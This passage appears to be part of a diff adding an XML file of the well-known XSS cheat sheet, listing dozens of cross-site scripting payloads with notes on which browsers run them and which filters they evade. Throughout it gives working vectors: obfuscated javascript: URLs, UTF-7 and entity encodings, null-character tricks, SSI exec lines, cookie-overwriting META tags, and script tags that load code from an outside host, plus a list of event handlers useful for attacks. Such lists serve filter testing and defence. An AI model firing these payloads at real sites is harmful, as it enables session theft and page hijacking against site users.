ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> + +</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></code> + <desc>XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>XML data island w/comment</name> + <code><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> + +<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></code> + <desc>XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive)</desc> + <label>HTML Element Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>XML (locally hosted)</name> + <code><XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> +<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></code> + + <desc>Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>XML HTML+TIME</name> + <code><HTML><BODY> +<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> + +<?import namespace="t" implementation="#default#time2"> +<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML></code> + + <desc>HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work.</desc> + <label>HTML Element Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Commented-out Block</name> + <code><!--[if gte IE 4]> +<SCRIPT>alert('XSS');</SCRIPT> +<![endif]--></code> + + <desc>Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job.</desc> + <label>Other Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Cookie Manipulation</name> + <code><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></code> + + <desc>Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc).</desc> + <label>Other Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Local .htc file</name> + <code><XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"></code> + <desc>This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.</desc> + <label>Other Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Rename .js to .jpg</name> + <code><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></code> + <desc>Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector.</desc> + + <label>Other Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>SSI</name> + <code><!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--></code> + + <desc>SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues.</desc> + <label>Other Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>PHP</name> + <code><? echo('<SCR)'; +echo('IPT>alert("XSS")</SCRIPT>'); ?></code> + + <desc>PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues.</desc> + <label>Other Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>JavaScript Includes</name> + <code><BR SIZE="&{alert('XSS')}"></code> + <desc>&JavaScript includes (works in Netscape 4.x).</desc> + <label>Other Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>]</browser> + + </attack> + <attack> + <name>Character Encoding Example</name> + <code>< +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 + +&#00060 +&#000060 +&#0000060 +&#60; +&#060; +&#0060; +&#00060; +&#000060; +&#0000060; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; + +&#x003c; +&#x0003c; +&#x00003c; +&#x000003c; +&#X3c +&#X03c +&#X003c +&#X0003c +&#X00003c +&#X000003c +&#X3c; +&#X03c; +&#X003c; +&#X0003c; +&#X00003c; +&#X000003c; +&#x3C + +&#x03C +&#x003C +&#x0003C +&#x00003C +&#x000003C +&#x3C; +&#x03C; +&#x003C; +&#x0003C; +&#x00003C; +&#x000003C; +&#X3C +&#X03C +&#X003C +&#X0003C +&#X00003C +&#X000003C + +&#X3C; +&#X03C; +&#X003C; +&#X0003C; +&#X00003C; +&#X000003C; +\x3c +\x3C +\u003c +\u003C</code> + <desc>All of the possible combinations of the character "<" in HTML and JavaScript. Most of these won't render, but many of them can get rendered in certain circumstances (standards are great, aren't they?).</desc> + <label>Character Encoding Attacks</label> + + <browser>Browser support:</browser> + </attack> + <attack> + <name>Case Insensitive</name> + <code><IMG SRC=JaVaScRiPt:alert('XSS')></code> + <desc>Case insensitive XSS attack vector.</desc> + + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>HTML Entities</name> + <code><IMG SRC=javascript:alert(&quot;XSS&quot;)></code> + <desc>HTML entities (the semicolons are required for this to work).</desc> + <label>Character Encoding Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Grave Accents</name> + <code><IMG SRC=`javascript:alert("RSnake says, 'XSS'")`></code> + <desc>Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents).</desc> + + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Image w/CharCode</name> + <code><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></code> + <desc>If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need.</desc> + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>UTF-8 Unicode Encoding</name> + <code><IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;></code> + + <desc>UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).</desc> + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Long UTF-8 Unicode w/out Semicolons</name> + <code><IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></code> + + <desc>Long UTF-8 Unicode encoding without semicolons (this is often effective in XSS that attempts to look for "&#XX;", since most people don't know about padding - up to 7 numeric characters total). This is also useful against people who decode against strings like $tmp_string =~ s/.*\&#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate an html encoded string (I've seen this in the wild).</desc> + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>DIV w/Unicode</name> + <code><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></code> + <desc>DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail.</desc> + <label>Character Encoding Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Hex Encoding w/out Semicolons</name> + <code><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></code> + + <desc>Hex encoding without semicolons (this is also a viable XSS attack against the above string $tmp_string = ~ s/.*\&#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).</desc> + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>UTF-7 Encoding</name> + <code><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</code> + + <desc>UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script.</desc> + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Escaping JavaScript escapes</name> + <code>\";alert('XSS');//</code> + <desc>Escaping JavaScript escapes. When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire.</desc> + + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>End title tag</name> + <code></TITLE><SCRIPT>alert("XSS");</SCRIPT></code> + <desc>This is a simple XSS vector that closes TITLE tags, which can encapsulate the malicious cross site scripting attack.</desc> + <label>Character Encoding Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>STYLE w/broken up JavaScript</name> + <code><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></code> + <desc>STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts).</desc> + + <label>Character Encoding Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Embedded Tab</name> + <code><IMG SRC="jav	ascript:alert('XSS');"></code> + <desc>Embedded tab to break up the cross site scripting attack.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Embedded Encoded Tab</name> + <code><IMG SRC="jav&#x09;ascript:alert('XSS');"></code> + <desc>Embedded encoded tab to break up XSS. For some reason Opera does not allow the encoded tab, but it does allow the previous tab XSS and encoded newline and carriage returns below.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Embedded Newline</name> + <code><IMG SRC="jav&#x0A;ascript:alert('XSS');"></code> + <desc>Embedded newline to break up XSS. Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Embedded Carriage Return</name> + <code><IMG SRC="jav&#x0D;ascript:alert('XSS');"></code> + <desc>Embedded carriage return to break up XSS (Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters).</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Multiline w/Carriage Returns</name> + <code><IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
</code> + + <desc>Multiline Injected JavaScript using ASCII carriage returns (same as above only a more extreme example of this XSS vector).</desc> + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Null Chars 1</name> + <code>perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out</code> + + <desc>Okay, I lied, null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy (http://www.portswigger.net/proxy/) or use %00 in the URL string or if you want to write your own injection tool you can use Vim (^V^@ will produce a null) to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hyphen control char). But the null char %00 is much more useful and helped me bypass certain real world filters with a variation on this example.</desc> + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Null Chars 2</name> + <code>perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out</code> + + <desc>Here is a little known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date</desc> + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Spaces/Meta Chars</name> + <code><IMG SRC=" &#14; javascript:alert('XSS');"></code> + <desc>Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word "javascript:" - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal).</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Non-Alpha/Non-Digit</name> + <code><SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT></code> + <desc>Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit is not valid after an HTML keyword and therefore considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s"</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Non-Alpha/Non-Digit Part 2</name> + <code><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></code> + <desc>Non-alpha-non-digit XSS part 2. yawnmoth brought my attention to this vector, based on the same idea as above, however, I expanded on it, using my fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this does not apply to the grave accent char as seen here.</desc> + <label>Embedded Character Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>No Closing Script Tag</name> + <code><SCRIPT SRC=http://ha.ckers.org/xss.js</code> + <desc>In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Protocol resolution in script tags</name> + <code><SCRIPT SRC=//ha.ckers.org/.j></code> + <desc>This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Half-Open HTML/JavaScript</name> + <code><IMG SRC="javascript:alert('XSS')"</code> + <desc>Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the "javascript:" directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close > tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex: + /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ +As a side note, this was also effective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Double open angle brackets</name> + <code><IFRAME SRC=http://ha.ckers.org/scriptlet.html <</code> + <desc>This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't</desc> + <label>Embedded Character Attacks</label> + + <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>]</browser> + + </attack> + <attack> + <name>Extraneous Open Brackets</name> + <code><<SCRIPT>alert("XSS");//<</SCRIPT></code> + <desc>(Submitted by Franz Sedlmaier http://www.pilorz.net/). This XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore (http://www.cs.utexas.edu/users/moore/best-ideas/string-searching/) that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Malformed IMG Tags</name> + <code><IMG """><SCRIPT>alert("XSS")</SCRIPT>"></code> + <desc>Originally found by Begeek (http://www.begeek.it/2006/03/18/esclusivo-vulnerabilita-xss-in-firefox/#more-300 - cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML tag.</desc> + + <label>Embedded Character Attacks</label> + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>No Quotes/Semicolons</name> + <code><SCRIPT>a=/XSS/ +alert(a.source)</SCRIPT></code> + <desc>No single quotes or double quotes or semicolons.</desc> + <label>Embedded Character Attacks</label> + + <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser> + + </attack> + <attack> + <name>Event Handlers List 1</name> + <code>See Below</code> + <desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates: + +-FSCommand() (execute from within an embedded Flash object) + +-onAbort() (when user aborts the loading of an image) + +-onActivate() (when object is set as the active element) + +-onAfterPrint() (activates after user prints or previews print job) + +-onAfterUpdate() (activates on data object after updating data in the source object) + +-onBeforeActivate() (fires before the object is set as the active element) + +-onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard (use the execCommand("Copy") function) + +-onBeforeCut() (attacker executes the attack string right before a selection is cut) + +-onBeforeDeactivate() (fires right after the activeElement is changed from the current object) + +-onBeforeEditFocus() (fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) + +-onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function) + +-onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function) + +-onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) + +-onBegin() (fires immediately when the element's timeline begins) + +-onBlur() (in the case where another popup is loaded and window loses focus) + +-onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window) + +-onCellChange() (fires when data changes in the data provider) + +-onChange() (fires when select, text, or TEXTAREA field loses focus and its value has been modified) + +-onClick() (fires when someone clicks on a form) + +-onContextMenu() (user would need to right click on attack area) + +-onControlSelect() (fires when the user is about to make a control selection of the object) + +-onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command) + +-onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command) + +-onDataAvailible() (user would need to change data in an element, or attacker could perform the same function) + +-onDataSetChanged() (fires when the data set exposed by a data source object changes) + +-onDataSetComplete() (fires to indicate that all data is available from the data source object) + +-onDblClick() (fires when user double-clicks a form element or a link) + +-onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document) + +-onDrag() (requires that the user drags an object) + +-onDragEnd() (requires that the user drags an object) + +-onDragLeave() (requires that the user drags an object off a valid location) + +-onDragEnter() (requires that the user drags an object into a valid location) + +-onDragOver() (requires that the user drags an object into a valid location) + +-onDragDrop() (user drops an object (e.g. file) onto the browser window) + +-onDrop() (fires when user drops an object (e.g. file) onto the browser window) + +</desc> + <label>Event Handlers</label> + <browser>Browser support:</browser> + </attack> + <attack> + <name>Event Handlers List 2</name> + <code>See Below</code> + + <desc>-onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">) + +-onError() (loading of a document or image causes an error) + +-onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object) + +-onFilterChange() (fires when a visual filter completes state change) + +-onFinish() (attacker could create the exploit when marquee is finished looping) + +-onFocus() (attacker executes the attack string when the window gets focus) + +-onFocusIn() (attacker executes the attack string when window gets focus) + +-onFocusOut() (attacker executes the attack string when window loses focus) + +-onHelp() (attacker executes the attack string when users hits F1 while the window is in focus) + +-onKeyDown() (fires when user depresses a key) + +-onKeyPress() (fires when user presses or holds down a key) + +-onKeyUp() (fires when user releases a key) + +-onLayoutComplete() (user would have to print or print preview) + +-onLoad() (attacker executes the attack string after the window loads) + +-onLoseCapture() (can be exploited by the releaseCapture() method) + +-onMediaComplete() (when a streaming media file is used, this event could fire before the file starts playing) + +-onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem) + +-onMouseDown() (the attacker would need to get the user to click on an image) + +-onMouseEnter() (fires when cursor moves over an object or area) + +-onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again) + +-onMouseMove() (the attacker would need to get the user to mouse over an image or table) + +-onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again) + +-onMouseOver() (fires when cursor moves over an object or area) + +-onMouseUp() (the attacker would need to get the user to click on an image) + +-onMouseWheel() (the attacker would need to get the user to use their mouse wheel) + +-onMove() (user or attacker would move the page) + +-onMoveEnd() (user or attacker would move the page) + +-onMoveStart() (user or attacker would move the page) + +-onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline) + +-onPaste() (user would need to paste or attacker could use the execCommand("Paste") function) + +-onPause() (fires on every element that is active when the timeline pauses, including the body element) + +-onProgress() (attacker would use this as a flash movie was loading) + +-onPropertyChange() (user or attacker would need to change an element property) + +-onReadyStateChange() (user or attacker would need to change an element property) +</desc> + <label>Event Handlers</label> + + <browser>Browser support:</browser> + </attack> + 